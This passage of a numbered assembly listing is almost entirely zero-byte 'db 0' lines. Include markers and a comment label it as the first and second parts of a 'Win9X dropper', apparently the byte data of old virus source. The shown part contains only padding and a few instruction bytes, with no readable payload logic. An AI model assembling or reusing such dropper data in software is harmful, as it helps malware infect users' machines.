2859.         db    0 ;  
2860.         db    0 ;  
2861.         db    0 ;  
2862.         db    0 ;  
2863.         db    0 ;  
2864.         db    0 ;  
2865.         db    0 ;  
2866.         db    0 ;  
2867.         db    0 ;  
2868.         db    0 ;  
2869.         db    0 ;  
2870.         db    0 ;  
2871.         db    0 ;  
2872.         db    0 ;  
2873.         db    0 ;  
2874.         db    0 ;  
2875.         db    0 ;  
2876.         db    0 ;  
2877.         db    0 ;  
2878.         db    0 ;  
2879.         db    0 ;  
2880.         db    0 ;  
2881.         db    0 ;  
2882.         db    0 ;  
2883.         db    0 ;  
2884.         db    0 ;  
2885.         db    0 ;  
2886.         db    0 ;  
2887.         db    0 ;  
2888.         db    0 ;  
2889.         db    0 ;  
2890.         db    0 ;  
2891.         db    0 ;  
2892.         db    0 ;  
2893.         db    0 ;  
2894.         db    0 ;  
2895.         db    0 ;  
2896.         db    0 ;  
2897.         db    0 ;  
2898.         db    0 ;  
2899.         db    0 ;  
2900.         db    0 ;  
2901.         db    0 ;  
2902.         db    0 ;  
2903.         db    0 ;  
2904.         db    0 ;  
2905.         db    0 ;  
2906.         db    0 ;  
2907.         db    0 ;  
2908.         db    0 ;  
2909.         db    0 ;  
2910.         db    0 ;  
2911.         db    0 ;  
2912.         db    0 ;  
2913.         db    0 ;  
2914.         db    0 ;  
2915.         db    0 ;  
2916.         db    0 ;  
2917.         db    0 ;  
2918.         db    0 ;  
2919.         db    0 ;  
2920.         db    0 ;  
2921.         db    0 ;  
2922.         db    0 ;  
2923.         db    0 ;  
2924.         db    0 ;  
2925.         db    0 ;  
2926.         db    0 ;  
2927.         db    0 ;  
2928.         db    0 ;  
2929.         db    0 ;  
2930.         db    0 ;  
2931.         db    0 ;  
2932.         db    0 ;  
2933.         db    0 ;  
2934.         db    0 ;  
2935.         db    0 ;  
2936.         db    0 ;  
2937.         db    0 ;  
2938.         db    0 ;  
2939.         db    0 ;  
2940.         db    0 ;  
2941.         db    0 ;  
2942.         db    0 ;  
2943.         db    0 ;  
2944.         db    0 ;  
2945.         db    0 ;  
2946.         db    0 ;  
2947.         db    0 ;  
2948.         db    0 ;  
2949.         db    0 ;  
2950.         db    0 ;  
2951.         db    0 ;  
2952.         db    0 ;  
2953.         db    0 ;  
2954.         db    0 ;  
2955.         db    0 ;  
2956.         db    0 ;  
2957.         db    0 ;  
2958.         db    0 ;  
2959.         db    0 ;  
2960.         db    0 ;  
2961.         db    0 ;  
2962.         db    0 ;  
2963.         db    0 ;  
2964.         db    0 ;  
2965.         db    0 ;  
2966.         db    0 ;  
2967.         db    0 ;  
2968.         db    0 ;  
2969.         db    0 ;  
2970.         db    0 ;  
2971.         db    0 ;  
2972.         db    0 ;  
2973.         db    0 ;  
2974.         db    0 ;  
2975.         db    0 ;  
2976.         db    0 ;  
2977.         db    0 ;  
2978.         db    0 ;  
2979.         db    0 ;  
2980.         db    0 ;  
2981.         db    0 ;  
2982.         db    0 ;  
2983.         db    0 ;  
2984.         db    0 ;  
2985.         db    0 ;  
2986.         db    0 ;  
2987.         db    0 ;  
2988.         db    0 ;  
2989.         db    0 ;  
2990.         db    0 ;  
2991.         db    0 ;  
2992.         db    0 ;  
2993.         db    0 ;  
2994.         db    0 ;  
2995.         db    0 ;  
2996.         db    0 ;  
2997.         db    0 ;  
2998.         db    0 ;  
2999.         db    0 ;  
3000.         db    0 ;  
3001.         db    0 ;  
3002.         db    0 ;  
3003.         db    0 ;  
3004.         db    0 ;  
3005.         db    0 ;  
3006.         db    0 ;  
3007.         db    0 ;  
3008.         db    0 ;  
3009.         db    0 ;  
3010.         db    0 ;  
3011.         db    0 ;  
3012.         db    0 ;  
3013.         db    0 ;  
3014.         db    0 ;  
3015.         db    0 ;  
3016.         db    0 ;  
3017.         db    0 ;  
3018.         db    0 ;  
3019.         db    0 ;  
3020.         db    0 ;  
3021.         db    0 ;  
3022.         db    0 ;  
3023.         db    0 ;  
3024.         db    0 ;  
3025.         db    0 ;  
3026.         db    0 ;  
3027.         db    0 ;  
3028.         db    0 ;  
3029.         db    0 ;  
3030.         db    0 ;  
3031.         db    0 ;  
3032.         db    0 ;  
3033.         db    0 ;  
3034.         db    0 ;  
3035.         db    0 ;  
3036.         db    0 ;  
3037.         db    0 ;  
3038.         db    0 ;  
3039.         db    0 ;  
3040.         db    0 ;  
3041.         db    0 ;  
3042.         db    0 ;  
3043.         db    0 ;  
3044.         db    0 ;  
3045.         db    0 ;  
3046.         db    0 ;  
3047.         db    0 ;  
3048.         db    0 ;  
3049.         db    0 ;  
3050.         db    0 ;  
3051.         db    0 ;  
3052.         db    0 ;  
3053.         db    0 ;  
3054.         db    0 ;  
3055.         db    0 ;  
3056.         db    0 ;  
3057.         db    0 ;  
3058.         db    0 ;  
3059.         db    0 ;  
3060.         db    0 ;  
3061.         db    0 ;  
3062.         db    0 ;  
3063.         db    0 ;  
3064.         db    0 ;  
3065.         db    0 ;  
3066.         db    0 ;  
3067.         db    0 ;  
3068.         db    0 ;  
3069.         db    0 ;  
3070.         db    0 ;  
3071.         db    0 ;  
3072.         db    0 ;  
3073.         db    0 ;  
3074.         db    0 ;  
3075.         db    0 ;  
3076.         db    0 ;  
3077.         db    0 ;  
3078.         db    0 ;  
3079.         db    0 ;  
3080.         db    0 ;  
3081.         db    0 ;  
3082.         db    0 ;  
3083.         db    0 ;  
3084.         db    0 ;  
3085.         db    0 ;  
3086.         db    0 ;  
3087.         db    0 ;  
3088.         db    0 ;  
3089.         db    0 ;  
3090.         db    0 ;  
3091.         db    0 ;  
3092.         db    0 ;  
3093.         db    0 ;  
3094.         db    0 ;  
3095.         db    0 ;  
3096.         db    0 ;  
3097.         db    0 ;  
3098.         db    0 ;  
3099.         db    0 ;  
3100.         db    0 ;  
3101.         db    0 ;  
3102.         db    0 ;  
3103.         db    0 ;  
3104.         db    0 ;  
3105.         db    0 ;  
3106.         db    0 ;  
3107.         db    0 ;  
3108.         db    0 ;  
3109.         db    0 ;  
3110.         db    0 ;  
3111.         db    0 ;  
3112.         db    0 ;  
3113.         db    0 ;  
3114.         db    0 ;  
3115.         db    0 ;  
3116.         db    0 ;  
3117.         db    0 ;  
3118.         db    0 ;  
3119.         db    0 ;  
3120.         db    0 ;  
3121.         db    0 ;  
3122.         db    0 ;  
3123.         db    0 ;  
3124.         db    0 ;  
3125.         db    0 ;  
3126.         db    0 ;  
3127.         db    0 ;  
3128.         db    0 ;  
3129.         db    0 ;  
3130.         db    0 ;  
3131.         db    0 ;  
3132.         db    0 ;  
3133.         db    0 ;  
3134.         db    0 ;  
3135.         db    0 ;  
3136.         db    0 ;  
3137.         db    0 ;  
3138.         db    0 ;  
3139.         db    0 ;  
3140.         db    0 ;  
3141.         db    0 ;  
3142.         db    0 ;  
3143.         db    0 ;  
3144.         db    0 ;  
3145.         db    0 ;  
3146.         db    0 ;  
3147.         db    0 ;  
3148.         db    0 ;  
3149.         db    0 ;  
3150.         db    0 ;  
3151.         db    0 ;  
3152.         db    0 ;  
3153.         db    0 ;  
3154.         db    0 ;  
3155.         db    0 ;  
3156.         db    0 ;  
3157.         db    0 ;  
3158.         db    0 ;  
3159.         db    0 ;  
3160.         db    0 ;  
3161.         db    0 ;  
3162.         db    0 ;  
3163.         db    0 ;  
3164.         db    0 ;  
3165.         db    0 ;  
3166.         db    0 ;  
3167.         db    0 ;  
3168.         db    0 ;  
3169.         db    0 ;  
3170.         db    0 ;  
3171.         db    0 ;  
3172.         db    0 ;  
3173.         db    0 ;  
3174.         db    0 ;  
3175.         db    0 ;  
3176.         db    0 ;  
3177.         db    0 ;  
3178.         db    0 ;  
3179.         db    0 ;  
3180.         db    0 ;  
3181.         db    0 ;  
3182.         db    0 ;  
3183.         db    0 ;  
3184.         db    0 ;  
3185.         db    0 ;  
3186.         db    0 ;  
3187.         db    0 ;  
3188.         db    0 ;  
3189.         db    0 ;  
3190.         db    0 ;  
3191.         db    0 ;  
3192.         db    0 ;  
3193.         db    0 ;  
3194.         db    0 ;  
3195.         db    0 ;  
3196.         db    0 ;  
3197.         db    0 ;  
3198.         db    0 ;  
3199.         db    0 ;  
3200.         db    0 ;  
3201.         db    0 ;  
3202.         db    0 ;  
3203.         db    0 ;  
3204.         db    0 ;  
3205.         db    0 ;  
3206.         db    0 ;  
3207.         db    0 ;  
3208.         db    0 ;  
3209.         db    0 ;  
3210.         db    0 ;  
3211.         db    0 ;  
3212.         db    0 ;  
3213.         db    0 ;  
3214.         db    0 ;  
3215.         db    0 ;  
3216.         db    0 ;  
3217.         db    0 ;  
3218.         db    0 ;  
3219.         db    0 ;  
3220.         db    0 ;  
3221.         db    0 ;  
3222.         db    0 ;  
3223.         db    0 ;  
3224.         db    0 ;  
3225.         db    0 ;  
3226.         db    0 ;  
3227.         db    0 ;  
3228.         db    0 ;  
3229.         db    0 ;  
3230.         db    0 ;  
3231.         db    0 ;  
3232.         db    0 ;  
3233.         db    0 ;  
3234.         db    0 ;  
3235.         db    0 ;  
3236.         db    0 ;  
3237.         db    0 ;  
3238.         db    0 ;  
3239.         db    0 ;  
3240.         db    0 ;  
3241.         db    0 ;  
3242.         db    0 ;  
3243.         db    0 ;  
3244.         db    0 ;  
3245.         db    0 ;  
3246.         db    0 ;  
3247.         db    0 ;  
3248.         db    0 ;  
3249.         db    0 ;  
3250.         db    0 ;  
3251.         db    0 ;  
3252.         db    0 ;  
3253.         db    0 ;  
3254.         db    0 ;  
3255.         db    0 ;  
3256.         db    0 ;  
3257.         db    0 ;  
3258.         db    0 ;  
3259.         db    0 ;  
3260.         db    0 ;  
3261.         db    0 ;  
3262.         db    0 ;  
3263.         db    0 ;  
3264.         db    0 ;  
3265.         db    0 ;  
3266.         db    0 ;  
3267.         db    0 ;  
3268.         db    0 ;  
3269.         db    0 ;  
3270.         db    0 ;  
3271.         db    0 ;  
3272.         db    0 ;  
3273.         db    0 ;  
3274.         db    0 ;  
3275.         db    0 ;  
3276.         db    0 ;  
3277.         db    0 ;  
3278.         db    0 ;  
3279.         db    0 ;  
3280.         db    0 ;  
3281.         db    0 ;  
3282.         db    0 ;  
3283.         db    0 ;  
3284.         db    0 ;  
3285.         db    0 ;  
3286.         db    0 ;  
3287.         db    0 ;  
3288.         db    0 ;  
3289.         db    0 ;  
3290.         db    0 ;  
3291.         db    0 ;  
3292.         db    0 ;  
3293.         db    0 ;  
3294.         db    0 ;  
3295.         db    0 ;  
3296.         db    0 ;  
3297.         db    0 ;  
3298.         db    0 ;  
3299.         db    0 ;  
3300.         db    0 ;  
3301.         db    0 ;  
3302.         db    0 ;  
3303.         db    0 ;  
3304.         db    0 ;  
3305.         db    0 ;  
3306.         db    0 ;  
3307.         db    0 ;  
3308.         db    0 ;  
3309.         db    0 ;  
3310.         db    0 ;  
3311.         db    0 ;  
3312.         db    0 ;  
3313.         db    0 ;  
3314.         db    0 ;  
3315.         db    0 ;  
3316.         db    0 ;  
3317.         db    0 ;  
3318.         db    0 ;  
3319.         db    0 ;  
3320.         db    0 ;  
3321.         db    0 ;  
3322.         db    0 ;  
3323.         db    0 ;  
3324.         db    0 ;  
3325.         db    0 ;  
3326.         db    0 ;  
3327.         db    0 ;  
3328.         db    0 ;  
3329.         db    0 ;  
3330.         db    0 ;  
3331.         db    0 ;  
3332.         db    0 ;  
3333.         db    0 ;  
3334.         db    0 ;  
3335.         db    0 ;  
3336.         db    0 ;  
3337.         db    0 ;  
3338.         db    0 ;  
3339.         db    0 ;  
3340.         db    0 ;  
3341.         db    0 ;  
3342.         db    0 ;  
3343.         db    0 ;  
3344.         db    0 ;  
3345.         db    0 ;  
3346.         db    0 ;  
3347.         db    0 ;  
3348.         db    0 ;  
3349.         db    0 ;  
3350.         db    0 ;  
3351.         db    0 ;  
3352.         db    0 ;  
3353.         db    0 ;  
3354.         db    0 ;  
3355.         db    0 ;  
3356.         db    0 ;  
3357.         db    0 ;  
3358.         db    0 ;  
3359.         db    0 ;  
3360.         db    0 ;  
3361.         db    0 ;  
3362.         db    0 ;  
3363.         db    0 ;  
3364.         db    0 ;  
3365.         db    0 ;  
3366.         db    0 ;  
3367.         db    0 ;  
3368.         db    0 ;  
3369.         db    0 ;  
3370.         db    0 ;  
3371.         db    0 ;  
3372.         db    0 ;  
3373.         db    0 ;  
3374.         db    0 ;  
3375.         db    0 ;  
3376.         db    0 ;  
3377.         db    0 ;  
3378.         db    0 ;  
3379.         db    0 ;  
3380.         db    0 ;  
3381.         db    0 ;  
3382.         db    0 ;  
3383.         db    0 ;  
3384.         db    0 ;  
3385.         db    0 ;  
3386.         db    0 ;  
3387.         db    0 ;  
3388.         db    0 ;  
3389.         db    0 ;  
3390.         db    0 ;  
3391.         db    0 ;  
3392.         db    0 ;  
3393.         db    0 ;  
3394.         db    0 ;  
3395.         db    0 ;  
3396.         db    0 ;  
3397.         db    0 ;  
3398.         db    0 ;  
3399.         db    0 ;  
3400.         db    0 ;  
3401.         db    0 ;  
3402.         db    0 ;  
3403.         db    0 ;  
3404.         db    0 ;  
3405.         db    0 ;  
3406.         db    0 ;  
3407.         db    0 ;  
3408.         db    0 ;  
3409.         db    0 ;  
3410.         db    0 ;  
3411.         db    0 ;  
3412.         db    0 ;  
3413.         db    0 ;  
3414.         db    0 ;  
3415.         db    0 ;  
3416.         db    0 ;  
3417.         db    0 ;  
3418.         db    0 ;  
3419.         db    0 ;  
3420.         db    0 ;  
3421.         db    0 ;  
3422.         db    0 ;  
3423.         db    0 ;  
3424.         db    0 ;  
3425.         db    0 ;  
3426.         db    0 ;  
3427.         db    0 ;  
3428.         db    0 ;  
3429.         db    0 ;  
3430.         db    0 ;  
3431.         db    0 ;  
3432.         db    0 ;  
3433.         db    0 ;  
3434.         db    0 ;  
3435.         db    0 ;  
3436.         db    0 ;  
3437.         db    0 ;  
3438.         db    0 ;  
3439.         db    0 ;  
3440.         db    0 ;  
3441.         db    0 ;  
3442.         db    0 ;  
3443.         db    0 ;  
3444.         db    0 ;  
3445.         db    0 ;  
3446.         db    0 ;  
3447.         db    0 ;  
3448.         db    0 ;  
3449.         db    0 ;  
3450.         db    0 ;  
3451.         db    0 ;  
3452.         db    0 ;  
3453.         db    0 ;  
3454.         db    0 ;  
3455.         db    0 ;  
3456.         db    0 ;  
3457.         db    0 ;  
3458.         db    0 ;  
3459.         db    0 ;  
3460.         db    0 ;  
3461.         db    0 ;  
3462.         db    0 ;  
3463.         db    0 ;  
3464.         db    0 ;  
3465.         db    0 ;  
3466.         db    0 ;  
3467.         db    0 ;  
3468.         db    0 ;  
3469.         db    0 ;  
3470.         db    0 ;  
3471.         db    0 ;  
3472.         db    0 ;  
3473.         db    0 ;  
3474.         db    0 ;  
3475.         db    0 ;  
3476.         db    0 ;  
3477.         db    0 ;  
3478.         db    0 ;  
3479.         db    0 ;  
3480.         db    0 ;  
3481.         db    0 ;  
3482.         db    0 ;  
3483.         db    0 ;  
3484.         db    0 ;  
3485.         db    0 ;  
3486.         db    0 ;  
3487.         db    0 ;  
3488.         db    0 ;  
3489.         db    0 ;  
3490.         db    0 ;  
3491.         db    0 ;  
3492.         db    0 ;  
3493.         db    0 ;  
3494.         db    0 ;  
3495.         db    0 ;  
3496.         db    0 ;  
3497.         db    0 ;  
3498.         db    0 ;  
3499.         db    0 ;  
3500.         db    0 ;  
3501.         db    0 ;  
3502.         db    0 ;  
3503.         db    0 ;  
3504.         db    0 ;  
3505.         db    0 ;  
3506.         db    0 ;  
3507.         db    0 ;  
3508.         db    0 ;  
3509.         db    0 ;  
3510.         db    0 ;  
3511.         db    0 ;  
3512.         db    0 ;  
3513.         db    0 ;  
3514.         db    0 ;  
3515.         db    0 ;  
3516.         db    0 ;  
3517.         db    0 ;  
3518.         db    0 ;  
3519.         db    0 ;  
3520.         db    0 ;  
3521.         db    0 ;  
3522.         db    0 ;  
3523.         db    0 ;  
3524.         db    0 ;  
3525.         db    0 ;  
3526.         db    0 ;  
3527.         db    0 ;  
3528.         db    0 ;  
3529.         db    0 ;  
3530.         db    0 ;  
3531.         db    0 ;  
3532.         db    0 ;  
3533.         db    0 ;  
3534.         db    0 ;  
3535.         db    0 ;  
3536.         db    0 ;  
3537.         db    0 ;  
3538.         db    0 ;  
3539.         db    0 ;  
3540.         db    0 ;  
3541.         db    0 ;  
3542.         db    0 ;  
3543.         db    0 ;  
3544.         db    0 ;  
3545.         db    0 ;  
3546.         db    0 ;  
3547.         db    0 ;  
3548.         db    0 ;  
3549.         db    0 ;  
3550.         db    0 ;  
3551.         db    0 ;  
3552.         db    0 ;  
3553.         db    0 ;  
3554.         db    0 ;  
3555.         db    0 ;  
3556.         db    0 ;  
3557.         db    0 ;  
3558.         db    0 ;  
3559.         db    0 ;  
3560.         db    0 ;  
3561.         db    0 ;  
3562.         db    0 ;  
3563.         db    0 ;  
3564.         db    0 ;  
3565.         db    0 ;  
3566.         db    0 ;  
3567.         db    0 ;  
3568.         db    0 ;  
3569.         db    0 ;  
3570.         db    0 ;  
3571.         db    0 ;  
3572.         db    0 ;  
3573.         db    0 ;  
3574.         db    0 ;  
3575.         db    0 ;  
3576.         db    0 ;  
3577.         db    0 ;  
3578.         db    0 ;  
3579.         db    0 ;  
3580.         db    0 ;  
3581.         db    0 ;  
3582.         db    0 ;  
3583.         db    0 ;  
3584.         db    0 ;  
3585.         db    0 ;  
3586.         db    0 ;  
3587.         db    0 ;  
3588.         db    0 ;  
3589.         db    0 ;  
3590.         db    0 ;  
3591.         db    0 ;  
3592.         db    0 ;  
3593.         db    0 ;  
3594.         db    0 ;  
3595.         db    0 ;  
3596.         db    0 ;  
3597.         db    0 ;  
3598.         db    0 ;  
3599.         db    0 ;  
3600.         db    0 ;  
3601.         db    0 ;  
3602.         db    0 ;  
3603.         db    0 ;  
3604.         db    0 ;  
3605.         db    0 ;  
3606.         db    0 ;  
3607.         db    0 ;  
3608.         db    0 ;  
3609.         db    0 ;  
3610.         db    0 ;  
3611.         db    0 ;  
3612.         db    0 ;  
3613.         db    0 ;  
3614.         db    0 ;  
3615.         db    0 ;  
3616.         db    0 ;  
3617.         db    0 ;  
3618.         db    0 ;  
3619.         db    0 ;  
3620.         db    0 ;  
3621.         db    0 ;  
3622.         db    0 ;  
3623.         db    0 ;  
3624.         db    0 ;  
3625.         db    0 ;  
3626.         db    0 ;  
3627.         db    0 ;  
3628.         db    0 ;  
3629.         db    0 ;  
3630.         db    0 ;  
3631.         db    0 ;  
3632.         db    0 ;  
3633.         db    0 ;  
3634.         db    0 ;  
3635.         db    0 ;  
3636.         db    0 ;  
3637.         db    0 ;  
3638.         db    0 ;  
3639.         db    0 ;  
3640.         db    0 ;  
3641.         db    0 ;  
3642.         db    0 ;  
3643.         db    0 ;  
3644.         db    0 ;  
3645.         db    0 ;  
3646.         db    0 ;  
3647.         db    0 ;  
3648.         db    0 ;  
3649.         db    0 ;  
3650.         db    0 ;  
3651.         db    0 ;  
3652.         db    0 ;  
3653.         db    0 ;  
3654.         db    0 ;  
3655.         db    0 ;  
3656.         db    0 ;  
3657.         db    0 ;  
3658.         db    0 ;  
3659.         db    0 ;  
3660.         db    0 ;  
3661.         db    0 ;  
3662.         db    0 ;  
3663.         db    0 ;  
3664.         db    0 ;  
3665.         db    0 ;  
3666.         db    0 ;  
3667.         db    0 ;  
3668.         db    0 ;  
3669.         db    0 ;  
3670.         db    0 ;  
3671.         db    0 ;  
3672.         db    0 ;  
3673.         db    0 ;  
3674.         db    0 ;  
3675.         db    0 ;  
3676.         db    0 ;  
3677.         db    0 ;  
3678.         db    0 ;  
3679.         db    0 ;  
3680.         db    0 ;  
3681.         db    0 ;  
3682.         db    0 ;  
3683.         db    0 ;  
3684.         db    0 ;  
3685.         db    0 ;  
3686.         db    0 ;  
3687.         db    0 ;  
3688.         db    0 ;  
3689.         db    0 ;  
3690.         db    0 ;  
3691.         db    0 ;  
3692.         db    0 ;  
3693.         db    0 ;  
3694.         db    0 ;  
3695.         db    0 ;  
3696.         db    0 ;  
3697.         db    0 ;  
3698.         db    0 ;  
3699.         db    0 ;  
3700.         db    0 ;  
3701.         db    0 ;  
3702.         db    0 ;  
3703.         db    0 ;  
3704.         db    0 ;  
3705.         db    0 ;  
3706.         db    0 ;  
3707.         db    0 ;  
3708.         db    0 ;  
3709.         db    0 ;  
3710.         db    0 ;  
3711.         db    0 ;  
3712.         db    0 ;  
3713.         db    0 ;  
3714.         db    0 ;  
3715.         db    0 ;  
3716.         db    0 ;  
3717.         db    0 ;  
3718.         db    0 ;  
3719.         db    0 ;  
3720.         db    0 ;  
3721.         db    0 ;  
3722.         db    0 ;  
3723.         db    0 ;  
3724.         db    0 ;  
3725.         db    0 ;
3726. ����������������������������������������������������������������[drop1.inc]���
3727. ����������������������������������������������������������������[drop2.inc]���
3728. ;second part of Win9X dropper
3729.         db 0FFh ;  
3730.         db  25h ; %
3731.         db  30h ; 0
3732.         db  50h ; P
3733.         db  40h ; @
3734.         db    0 ;  
3735.         db    0 ;  
3736.         db    0 ;  
3737.         db    0 ;  
3738.         db    0 ;  
3739.         db    0 ;  
3740.         db    0 ;  
3741.         db    0 ;  
3742.         db    0 ;  
3743.         db    0 ;  
3744.         db    0 ;  
3745.         db    0 ;  
3746.         db    0 ;  
3747.         db    0 ;  
3748.         db    0 ;  
3749.         db    0 ;  
3750.         db    0 ;  
3751.         db    0 ;  
3752.         db    0 ;  
3753.         db    0 ;  
3754.         db    0 ;  
3755.         db    0 ;  
3756.         db    0 ;  
3757.         db    0 ;  
3758.         db    0 ;  
3759.         db    0 ;  
3760.         db    0 ;  
3761.         db    0 ;  
3762.         db    0 ;  
3763.         db    0 ;  
3764.         db    0 ;  
3765.         db    0 ;  
3766.         db    0 ;  
3767.         db    0 ;  
3768.         db    0 ;  
3769.         db    0 ;  
3770.         db    0 ;  
3771.         db    0 ;  
3772.         db    0 ;  
3773.         db    0 ;  
3774.         db    0 ;  
3775.         db    0 ;  
3776.         db    0 ;  
3777.         db    0 ;  
3778.         db    0 ;  
3779.         db    0 ;  
3780.         db    0 ;  
3781.         db    0 ;  
3782.         db    0 ;  
3783.         db    0 ;  
3784.         db    0 ;  
3785.         db    0 ;  
3786.         db    0 ;  
3787.         db    0 ;  
3788.         db    0 ;  
3789.         db    0 ;  
3790.         db    0 ;  
3791.         db    0 ;  
3792.         db    0 ;  
3793.         db    0 ;  
3794.         db    0 ;  
3795.         db    0 ;  
3796.         db    0 ;  
3797.         db    0 ;  
3798.         db    0 ;  
3799.         db    0 ;  
3800.         db    0 ;  
3801.         db    0 ;  
3802.         db    0 ;  
3803.         db    0 ;  
3804.         db    0 ;  
3805.         db    0 ;  
3806.         db    0 ;  
3807.         db    0 ;  
3808.         db    0 ;  
3809.         db    0 ;  
3810.         db    0 ;  
3811.         db    0 ;  
3812.         db    0 ;  
3813.         db    0 ;  
3814.         db    0 ;  
3815.         db    0 ;  
3816.         db    0 ;  
3817.         db    0 ;  
3818.         db    0 ;  
3819.         db    0 ;  
3820.         db    0 ;  
3821.         db    0 ;  
3822.         db    0 ;  
3823.         db    0 ;  
3824.         db    0 ;  
3825.         db    0 ;  
3826.         db    0 ;  
3827.         db    0 ;  
3828.         db    0 ;  
3829.         db    0 ;  
3830.         db    0 ;  
3831.         db    0 ;  
3832.         db    0 ;  
3833.         db    0 ;  
3834.         db    0 ;  
3835.         db    0 ;  
3836.         db    0 ;  
3837.         db    0 ;  
3838.         db    0 ;  
3839.         db    0 ;  
3840.         db    0 ;  
3841.         db    0 ;  
3842.         db    0 ;  
3843.         db    0 ;  
3844.         db    0 ;  
3845.         db    0 ;  
3846.         db    0 ;  
3847.         db    0 ;  
3848.         db    0 ;  
3849.         db    0 ;  
3850.         db    0 ;  
3851.         db    0 ;  
3852.         db    0 ;  
3853.         db    0 ;  
3854.         db    0 ;  
3855.         db    0 ;  
3856.         db    0 ;  
3857.         db    0 ;  
3858.         db    0 ;  
3859.         db    0 ;  
3860.         db    0 ;  
3861.         db    0 ;  
3862.         db    0 ;  
3863.         db    0 ;  
3864.         db    0 ;  
3865.         db    0 ;  
3866.         db    0 ;  
3867.         db    0 ;  
3868.         db    0 ;  
3869.         db    0 ;  
3870.         db    0 ;  
3871.         db    0 ;  
3872.         db    0 ;  
3873.         db    0 ;  
3874.         db    0 ;  
3875.         db    0 ;  
3876.         db    0 ;  
3877.         db    0 ;  
3878.         db    0 ;  
3879.         db    0 ;  
3880.         db    0 ;  
3881.         db    0 ;  
3882.         db    0 ;  
3883.         db    0 ;  
3884.         db    0 ;  
3885.         db    0 ;  
3886.         db    0 ;  
3887.         db    0 ;  
3888.         db    0 ;  
3889.         db    0 ;  
3890.         db    0 ;  
3891.         db    0 ;  
3892.         db    0 ;  
3893.         db    0 ;  
3894.         db    0 ;  
3895.         db    0 ;  
3896.         db    0 ;  
3897.         db    0 ;  
3898.         db    0 ;  
3899.         db    0 ;  
3900.         db    0 ;  
3901.         db    0 ;  
3902.         db    0 ;  
3903.         db    0 ;  
3904.         db    0 ;  
3905.         db    0 ;  
3906.         db    0 ;  
3907.         db    0 ;  
3908.         db    0 ;  
3909.         db    0 ;  
3910.         db    0 ;  
3911.         db    0 ;  
3912.         db    0 ;  
3913.         db    0 ;  
3914.         db    0 ;  
3915.         db    0 ;  
3916.         db    0 ;  
3917.         db    0 ;  
3918.         db    0 ;  
3919.         db    0 ;  
3920.         db    0 ;  
3921.         db    0 ;  
3922.         db    0 ;  
3923.         db    0 ;  
3924.         db    0 ;  
3925.         db    0 ;  
3926.         db    0 ;  
3927.         db    0 ;  
3928.         db    0 ;  
3929.         db    0 ;  
3930.         db    0 ;  
3931.         db    0 ;  
3932.         db    0 ;  
3933.         db    0 ;  
3934.         db    0 ;  
3935.         db    0 ;  
3936.         db    0 ;  
3937.         db    0 ;  
3938.         db    0 ;  
3939.         db    0 ;  
3940.         db    0 ;  
3941.         db    0 ;  
3942.         db    0 ;  
3943.         db    0 ;  
3944.         db    0 ;  
3945.         db    0 ;  
3946.         db    0 ;  
3947.         db    0 ;  
3948.         db    0 ;  
3949.         db    0 ;  
3950.         db    0 ;  
3951.         db    0 ;  
3952.         db    0 ;  
3953.         db    0 ;  
3954.         db    0 ;  
3955.         db    0 ;  
3956.         db    0 ;  
3957.         db    0 ;  
3958.         db    0 ;  
3959.         db    0 ;  
3960.         db    0 ;  
3961.         db    0 ;  
3962.         db    0 ;  
3963.         db    0 ;  
3964.         db    0 ;  
3965.         db    0 ;  
3966.         db    0 ;  
3967.         db    0 ;  
3968.         db    0 ;  
3969.         db    0 ;  
3970.         db    0 ;  
3971.         db    0 ;  
3972.         db    0 ;  
3973.         db    0 ;  
3974.         db    0 ;  
3975.         db    0 ;  
3976.         db    0 ;  
3977.         db    0 ;  
3978.         db    0 ;  
3979.         db    0 ;  
3980.         db    0 ;  
3981.         db    0 ;  
3982.         db    0 ;  
3983.         db    0 ;  
3984.         db    0 ;  
3985.         db    0 ;  
3986.         db    0 ;  
3987.         db    0 ;  
3988.         db    0 ;  
3989.         db    0 ;  
3990.         db    0 ;  
3991.         db    0 ;  
3992.         db    0 ;  
3993.         db    0 ;  
3994.         db    0 ;  
3995.         db    0 ;  
3996.         db    0 ;  
3997.         db    0 ;  
3998.         db    0 ;  
3999.         db    0 ;  
4000.         db    0 ;  
4001.         db    0 ;  
4002.         db    0 ;  
4003.         db    0 ;  
4004.         db    0 ;  
4005.         db    0 ;  
4006.         db    0 ;  
4007.         db    0 ;  
4008.         db    0 ;  
4009.         db    0 ;  
4010.         db    0 ;  
4011.         db    0 ;  
4012.         db    0 ;  
4013.         db    0 ;  
4014.         db    0 ;  
4015.         db    0 ;  
4016.         db    0 ;  
4017.         db    0 ;  
4018.         db    0 ;  
4019.         db    0 ;  
4020.         db    0 ;  
4021.         db    0 ;  
4022.         db    0 ;  
4023.         db    0 ;  
4024.         db    0 ;  
4025.         db    0 ;  
4026.         db    0 ;  
4027.         db    0 ;  
4028.         db    0 ;  
4029.         db    0 ;  
4030.         db    0 ;  
4031.         db    0 ;  
4032.         db    0 ;  
4033.         db    0 ;  
4034.         db    0 ;  
4035.         db    0 ;  
4036.         db    0 ;  
4037.         db    0 ;  
4038.         db    0 ;  
4039.         db    0 ;  
4040.         db    0 ;  
4041.         db    0 ;  
4042.         db    0 ;  
4043.         db    0 ;  
4044.         db    0 ;  
4045.         db    0 ;  
4046.         db    0 ;  
4047.         db    0 ;  
4048.         db    0 ;  
4049.         db    0 ;  
4050.         db    0 ;  
4051.         db    0 ;  
4052.         db    0 ;  
4053.         db    0 ;  
4054.         db    0 ;  
4055.         db    0 ;  
4056.         db    0 ;  
4057.         db    0 ;  
4058.         db    0 ;  
4059.         db    0 ;  
4060.         db    0 ;  
4061.         db    0 ;  
4062.         db    0 ;  
4063.         db    0 ;  
4064.         db    0 ;  
4065.         db    0 ;  
4066.         db    0 ;  
4067.         db    0 ;  
4068.         db    0 ;  
4069.         db    0 ;  
4070.         db    0 ;  
4071.         db    0 ;  
4072.         db    0 ;  
4073.         db    0 ;  
4074.         db    0 ;  
4075.         db    0 ;  
4076.         db    0 ;  
4077.         db    0 ;  
4078.         db    0 ;  
4079.         db    0 ;  
4080.         db    0 ;  
4081.         db    0 ;  
4082.         db    0 ;  
4083.         db    0 ;  
4084.         db    0 ;  
4085.         db    0 ;  
4086.         db    0 ;  
4087.         db    0 ;  
4088.         db    0 ;  
4089.         db    0 ;  
4090.         db    0 ;  
4091.         db    0 ;  
4092.         db    0 ;  
4093.         db    0 ;  
4094.         db    0 ;  
4095.         db    0 ;  
4096.         db    0 ;  
4097.         db    0 ;  
4098.         db    0 ;  
4099.         db    0 ;  
4100.         db    0 ;  
4101.         db    0 ;  
4102.         db    0 ;  
4103.         db    0 ;  
4104.         db    0 ;  
4105.         db    0 ;  
